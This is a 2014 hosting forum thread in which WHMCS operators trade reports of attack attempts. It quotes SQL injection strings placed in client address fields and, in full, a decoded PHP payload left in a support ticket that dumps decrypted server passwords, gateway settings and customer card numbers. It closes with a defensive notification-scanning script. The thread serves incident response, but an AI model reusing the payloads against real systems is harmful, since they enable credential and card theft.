ekcomobile Posted November 23, 2014
I just did this "fix" of blocking fields from being changed. But I have to tell you that on the 20th I had this same sign-up for probably the 8th time in the past few months. This time though I got emails from my hosting service and from a company that does fraud protection and monitoring for Apple ID. Both were informing me of the hack. I've gone through all of my clients' sites' cPanel files and have found alterations over the past 24 hours. Mostly new files, sub-domains and directories added. Many are empty. But a few have had over 100 .dat files added to them, and one with the sub-domain called remax.com has been blocked by Norton and my mobile browser. There are also client sites getting "you are forbidden access on this server". But every time I've had this same client sign-up and client info change I have to go through all of my clients' sites and find alterations. Every time! One time the guy was attacking a bank in Brazil when I got emails from another protection company. The attacks are more frequent and more aggressive each time. Wish I had known of the prevention of client info change earlier. I've been trying to figure out how to use code to block special characters other than @ and . and of course alphanumerics. Now I have to also go and get my clients' sites all checked against Norton and blacklists. Not the first time, but hopefully the last.
easyhosting Posted November 23, 2014
WHMCS is not giving importance to our post in which we have requested that they give an email verification option for newly registering users in the next update. An email verification module is available: http://forum.whmcs.com/showthread.php?73867-New-Addon-Email-Verification-WHMCS-Module
durangod Posted November 23, 2014
Many of you just need to upgrade. I know some of you have different issues with regard to what happens, but as I look through these posts, not only here but also in other threads, I see update, update, update. Honestly, if you can't afford to update then you can't afford to be in business; it's really that simple. Sure, just like anything there will always be exceptions and we have to stay one step ahead of those idiots trying to hack, but you lessen your chances by a huge amount if you just stay current. If you need help updating let someone know, do a ticket, we are here to help, but that's the best thing you can do.
easyhosting Posted November 23, 2014
Many of you just need to upgrade. I know some of you have different issues with regard to what happens, but as I look through these posts, not only here but also in other threads, I see update, update, update. Honestly, if you can't afford to update then you can't afford to be in business; it's really that simple. Sure, just like anything there will always be exceptions and we have to stay one step ahead of those idiots trying to hack, but you lessen your chances by a huge amount if you just stay current. If you need help updating let someone know, do a ticket, we are here to help, but that's the best thing you can do.

I agree. Many threads on this subject, and rather than people looking at or reading current threads they start another thread, but the answer is the same. This hacker is trying to use an old vulnerability from an old version of WHMCS, so if you have an up-to-date WHMCS installation then you will be fine.
ekcomobile Posted November 23, 2014
Completely up to date, so this is not my issue. Already today they have tried twice to do this hack and the refusal to allow them to automatically do it has stopped them. Simple solution. Now just to finish removing everything and getting my clients' sites unblocked.
- - - Updated - - -
Sorry, that was meant to be the refusal to automatically allow them to change their personal info after registering.
easyhosting Posted November 23, 2014
We use MaxMind, and yes, these hackers using the name Aganteng Rooterz have tried to set up accounts, but MaxMind stopped these, so no accounts were ever set up.
davey Posted November 25, 2014 (edited)
Hi,
This guy is trying to exploit our WHMCS system as well, for over 5 months now. Almost every day he tries to get access to our servers with a new account. Also read this post: http://forum.whmcs.com/showthread.php?93239-Spam-Account-Keeps-Registering&p=393526#post393526
If you want all IP addresses that I've banned so far, please contact me.
Edited November 25, 2014 by davey
Cain72 Posted November 25, 2014
176.223.125.144
mxserver.ro = 188.212.156.52 = a: 52-156-static.mxserver.ro
Continent Lat/Lon: 48.69083 / 9.1405
Country Lat/Lon: 46 / 25
City Lat/Lon: (47.1333) / (24.4833)
IP Language: Romanian
IP Address Speed: Unknown Internet Speed
Continent: Europe (EU)
Country: Romania (RO)
Capital: Bucharest
State: Bistrita-Nasaud
City Location: Bistrita
ISP: Net Design SRL
Organization: Net Design SRL
------------------------
188.212.156.52
Continent Lat/Lon: 48.69083 / 9.1405
Country Lat/Lon: 46 / 25
City Lat/Lon: (46) / (25)
IP Language: Romanian
Continent: Europe (EU)
Country: Romania (RO)
Capital: Bucharest
ISP: Webfactor SRL
Organization: Webfactor SRL
AS Number: AS35818 Webfactor SRL
Time Zone: Europe/Bucharest
-----------------------
My humble suggestion: block Europe, entirely, at least for the time being, apply the necessary firewall changes, break the existing network state of your firewalls and force a fresh network reconnection, and review your logs for more clues.
Cain
davey Posted November 25, 2014
Don't think that would be an option, to be honest. Thereby, this guy uses proxies also located in the USA. These IPs he already used on our website.
Cain72 Posted November 25, 2014 (edited)
Yeah, I kind of expected that. Thanks for the list, always good to have leads to hand to the sharks to play with.
PS: What's up with the dates on that list? Have you checked the integrity of the log files?
Cain
Edited November 25, 2014 by Cain72
devdarsh Posted November 25, 2014
I am facing the hacking attempts too.

Client ID: 10 - asal daftar has requested to change his/her details as indicated below:
Address 1: 'cyberteam' to 'AES_ENCRYPT(1,1), address1= (SELECT MIN(type) FROM tblservers)'
Address 2: 'cyberteam' to 'AES_ENCRYPT(1,1), address2= (SELECT MIN(ipaddress) FROM tblservers)'
City: 'cyberteam' to 'AES_ENCRYPT(1,1), city= (SELECT MIN(username) FROM tblservers)'
State: 'saint' to 'AES_ENCRYPT(1,1), state= (SELECT MIN(accesshash) FROM tblservers)'
Default Payment Method: '' to ''
If you are unhappy with any of the changes, you need to login and revert them - this is the only record of the old details.
This change request was submitted from galaxie.websitewelcome.com (192.185.81.131)

The hacker opened a support ticket with a subject inserting an eval function and a base64_decode function in it. The base64-decoded code is:

include('configuration.php');
print " ===== Read Config ===== ";
print "\n";
echo " Database : ".$db_name." ";
print "\n";
echo " Username : ".$db_username." ";
print "\n";
echo " Password : ".$db_password." ";
print "\n";
echo " CC_encryption_Hash : ".$cc_encryption_hash." ";
print "\n";
$query = mysql_query("SELECT * FROM tblservers");
$text=$text."\r\n######################### HOST ROOTS ###########################\r\n";
while($v = mysql_fetch_array($query)) {
    $ipaddress = $v['ipaddress'];
    $username = $v['username'];
    $type = $v['type'];
    $active = $v['active'];
    $hostname = $v['hostname'];
    $password = decrypt ($v['password'], $cc_encryption_hash);
    $text=$text."Type $type\r\n";
    $text=$text."Active $active\r\n";
    $text=$text."Hostname $hostname\r\n";
    $text=$text."Ip $ipaddress\r\n";
    $text=$text."Username $username\r\n";
    $text=$text."Password $password\r\n**************************************\r\n";
}
$text=$text."\r\n######################### HOST ROOTS ###########################\r\n";
$text=$text."\r\n######################### Domain Reseller ###########################\r\n";
$query = mysql_query("SELECT * FROM tblregistrars");
while($v = mysql_fetch_array($query)) {
    $registrar = $v['registrar'];
    $setting = $v['setting'];
    $value = decrypt ($v['value'], $cc_encryption_hash);
    if ($value=="") { $value=0; }
    $password = decrypt ($v['password'], $cc_encryption_hash);
    $text=$text."$registrar $setting $value\r\n";
}
$text=$text."\r\n######################### Domain Reseller ###########################\r\n";
$text=$text."\r\n######################### FTP +SMTP ###########################\r\n";
$query = mysql_query("SELECT * FROM tblconfiguration where setting='FTPBackupHostname' or setting='FTPBackupUsername' or setting='FTPBackupPassword' or setting='FTPBackupDestination' or setting='SMTPHost' or setting='SMTPUsername' or setting='SMTPPassword' or setting='SMTPPort'");
while($v = mysql_fetch_array($query)) {
    $value =$v['value'];
    if ($value=="") { $value=0; }
    $text=$text.$v['setting']." ".$value."\r\n" ;
}
$text=$text."\r\n######################### FTP +SMTP ###########################\r\n";
$text=$text."\r\n######################### Payment gateway ###########################\r\n";
$query = mysql_query("SELECT * FROM tblpaymentgateways");
while($v = mysql_fetch_array($query)) {
    $gateway = $v['gateway'];
    $setting = $v['setting'];
    $value = $v['value'];
    $text=$text."$gateway|$setting|$value\r\n";
}
$text=$text."\r\n######################### Payment gateway ###########################\r\n";
$text=$text."\r\n######################### Client R00ts ###########################\r\n";
$query = mysql_query("SELECT * FROM tblhosting where (username = 'root' or username = 'Admin' or username = 'admin' or username = 'Administrator' or username = 'administrator') and domainstatus='Active'");
while($v = mysql_fetch_array($query)) {
    $text=$text."\r\nDomain ".$v['domain']."\r\nIP ".$v['dedicatedip']."\r\nUsername ".$v['username']."\r\nPassword ".decrypt ($v['password'], $cc_encryption_hash)."\r\nDomainstatus".$v['domainstatus']."\r\n";
}
$text=$text."\r\n######################### Client R00ts ###########################\r\n";
$text=$text."\r\n######################### Client HOST ###########################\r\n";
$query = mysql_query("SELECT * FROM tblhosting where domainstatus='Active'");
while($v = mysql_fetch_array($query)) {
    if (($v['username'] ) and ($v['password'])) {
        $text=$text."\r\nDomain ".$v['domain']."\r\nIP ".$v['dedicatedip']."\r\nUsername ".$v['username']."\r\nPassword ".decrypt ($v['password'], $cc_encryption_hash)."\r\nDomainstatus".$v['domainstatus']."\r\n";
    }
}
$text=$text."\r\n######################### Client HOST ###########################\r\n";
$text=$text."\r\n######################### Client CC ###########################\r\n";
$query = mysql_query("SELECT * FROM `tblclients` WHERE cardtype <> '' order by issuenumber desc");
while($v = mysql_fetch_array($query)) {
    $cchash = md5( $cc_encryption_hash.$v['0']);
    $s= mysql_query("select cardtype,AES_DECRYPT(cardnum,'{$cchash}') as cardnum,AES_DECRYPT(expdate,'{$cchash}') as expdate,AES_DECRYPT(issuenumber,'{$cchash}') as issuenumber,AES_DECRYPT(startdate,'{$cchash}') as startdate,country,email,firstname,lastname,address1,city,state,postcode,phonenumber FROM `tblclients` where id='".$v['0']."'" );
    $country = $v['country'];
    $email = $v['email'];
    $firstname = $v['firstname'];
    $lastname = $v['lastname'];
    $address1 = $v['address1'];
    $city = $v['city'];
    $state = $v['state'];
    $postcode = $v['postcode'];
    $phonenumber = $v['phonenumber'];
    $v2=mysql_fetch_array($s);
    $text=$text."\r\n".$v2[0]."|".$v2[1]."|".$v2[2]."|".$v2[3]."|".$v2[4]." $firstname $lastname ~ $address1:$city:$state:$postcode:$phonenumber $country $email\r\n";
}
$text=$text."\r\n######################### Client CC ###########################\r\n";
echo($text);

I cannot open new threads here; they are not appearing in the forum. Do I not have permission?
davey Posted November 25, 2014
The date that is displayed is the date until which this IP has been banned, not the date since when he got banned.
davey Posted November 25, 2014
I had this kind of support ticket about a year ago as well; this only happened once. Did you restrict the support departments to registered users only?
devdarsh Posted November 26, 2014
I had this kind of support ticket about a year ago as well; this only happened once. Did you restrict the support departments to registered users only?

Not restricted for the sales department for sales inquiries; he used that. Now restricted for that too. Now we cannot use required features even though they are available with WHMCS.
davey Posted November 26, 2014
Did you set up the reCAPTCHA for unregistered users? If not, this can prevent tickets like these as well.
devdarsh Posted November 26, 2014
Did you set up the reCAPTCHA for unregistered users? If not, this can prevent tickets like these as well.

But I hope these kinds of activities are from real persons, not from any scripts.
Cain72 Posted November 27, 2014 (edited)
Ya know what .. after this entire post it's made me rethink just how many of you actually understand IT .. how many of you have any real-world network experience?? And no, before you spout off, I'm not taking a dig at anyone here, it's not like that, it's just an honest evaluation of the type of people that are running wannabe hosting systems thinking it's all going to be easy cash .. it's not ... if you don't understand what you are doing .. bail now, and find another industry to delve into ... because if you don't have the knowledge behind you to resolve such an issue, believe me the last thing you want is to encounter someone who lives and breathes this stuff ... in short, if I was a client, I would be mortified to read this forum post, and honestly some of my clients do .. sorry guys... the first and only time you'll see honesty on that kind of level..
Cain
Edited November 27, 2014 by Cain72
easyhosting Posted November 27, 2014
I noticed a pattern with the attempts to set up accounts with us in that the IP ranges were all on Singlehop servers, so after barring the CITR of the IPs I contacted Singlehop with all the information along with links to various forums discussing these hacks, and ever since then no further orders have been attempted by him.
bear Posted November 28, 2014
if you dont understand what you are doing .. bail now

Feel free to share how, if you're capable of resolving this in some definitive way.

after barring the CITR of the IPs

Did you mean CIDR there (Classless Inter-Domain Routing)?
Infopro Posted November 28, 2014
Feel free to share

No need to ask that, you are fully aware of what he meant.

Did you mean

Of course he did. This thread is going around and around now, so, time to close it, just like the ones before it.
technicalguy Posted November 28, 2014
Anyone else seen this type of problem? Got a notification of an account creation where information was changed in fields to attempt to run SQL code:

First Name: 'go' to 'Andri'
Last Name: 'Team' to 'Cyber4rt'
Company Name: ' testing ' to ' DMASTERPIECE '
Address 1: 'dm' to 'AES_ENCRYPT(1,1), address1= (SELECT MIN(username) FROM tbladmins)'
Address 2: 'dm' to 'AES_ENCRYPT(1,1), address2= (SELECT MIN(password) FROM tbladmins)'
Postcode: '404403' to 'dm'
Default Payment Method: '' to ''
If you are unhappy with any of the changes, you need to login and revert them - this is the only record of the old details.
This change request was submitted from spo-rbr3.dizinc.com (187.45.185.98)

Record has been deleted, but this is a concern for sure. First time I've seen it.
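The "has requested to change his/her details" notifications quoted by devdarsh and technicalguy follow a fixed layout, so an admin can check them mechanically instead of by eye. This is an added example, not WHMCS code or any poster's: it parses the "Field: 'old' to 'new'" lines from such a mail, flags new values that carry the AES_ENCRYPT/subquery pattern seen in this thread, and applies the kind of per-field character allowlist ekcomobile asked about (the allowlists, the function names and the sample mail are my own assumptions, modelled on the notifications above).

```python
import re

# Constructed sample modelled on the admin notifications quoted in this thread.
SAMPLE_NOTIFICATION = """Client ID: 10 - asal daftar has requested to change his/her details as indicated below:
Address 1: 'cyberteam' to 'AES_ENCRYPT(1,1), address1= (SELECT MIN(type) FROM tblservers)'
Address 2: 'cyberteam' to 'AES_ENCRYPT(1,1), address2= (SELECT MIN(ipaddress) FROM tblservers)'
City: 'cyberteam' to 'Springfield'
Postcode: '404403' to 'dm'
Default Payment Method: '' to ''
This change request was submitted from galaxie.websitewelcome.com (192.185.81.131)
"""

# One "Field: 'old' to 'new'" line per changed field (the mail does not escape quotes,
# so old/new are matched lazily around the single "' to '" separator).
CHANGE_RE = re.compile(r"^(?P<field>[^:]+): '(?P<old>.*)' to '(?P<new>.*)'$")

# Markers of the injection seen in this thread: a function call that closes the
# intended column value, then a second column assigned from a subquery.
INJECTION_RE = re.compile(
    r"AES_ENCRYPT\s*\(|\bSELECT\b.*\bFROM\b|,\s*\w+\s*=\s*\(", re.IGNORECASE)

# Per-field character allowlists (assumption: sensible defaults, not WHMCS's own rules).
FIELD_ALLOWED = {
    "Email": re.compile(r"^[A-Za-z0-9@._+-]+$"),
    "Postcode": re.compile(r"^[A-Za-z0-9 -]*$"),
    "Phone": re.compile(r"^[0-9 +()-]*$"),
}
DEFAULT_ALLOWED = re.compile(r"^[A-Za-z0-9 .,&/-]*$")  # names, addresses, city, state


def parse_changes(body):
    """Return [(field, old, new)] for every change line in a notification body."""
    changes = []
    for line in body.splitlines():
        m = CHANGE_RE.match(line.strip())
        if m:
            changes.append((m["field"].strip(), m["old"], m["new"]))
    return changes


def field_is_clean(field, value):
    """Allowlist check: only characters expected in that field are accepted."""
    return bool(FIELD_ALLOWED.get(field, DEFAULT_ALLOWED).match(value))


def flag_changes(body):
    """Map each suspicious field to a reason: SQL pattern first, then allowlist failure."""
    flagged = {}
    for field, _old, new in parse_changes(body):
        if INJECTION_RE.search(new):
            flagged[field] = "sql-injection-pattern"
        elif not field_is_clean(field, new):
            flagged[field] = "disallowed-characters"
    return flagged


if __name__ == "__main__":
    for field, reason in flag_changes(SAMPLE_NOTIFICATION).items():
        print(f"{field}: {reason}")
```

A flagged notification is a reason to revert the change and review the account, not proof that the injection worked; whether it did depends on the WHMCS version, as the earlier replies note.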
Infopro Posted November 28, 2014
http://forums.whmcs.com/showthread.php?95263-Keep-getting-hacked
http://forums.whmcs.com/showthread.php?93239-Spam-Account-Keeps-Registering
We'll most likely merge your thread into one of those.
Konink Posted December 22, 2014
Hello,
2 days ago I got this account created in our system:

First name: Andri
Last name: Cyber4rt
Company name: DMASTERPIECE
Email address: DM@GMAIL.COM
Address 1: AES_ENCRYPT(1,1), address1= (SELECT MIN(username) FROM tbladmins)
Address 2: AES_ENCRYPT(1,1), address2= (SELECT MIN(password) FROM tbladmins)
City: dm
State/Province: Arizona
Postcode: dm
Country: US - United States
Phone number: 086969696969

He/they tried to register a domain but I cancelled the order (all orders need to be accepted by an admin). Do I need to do something or...?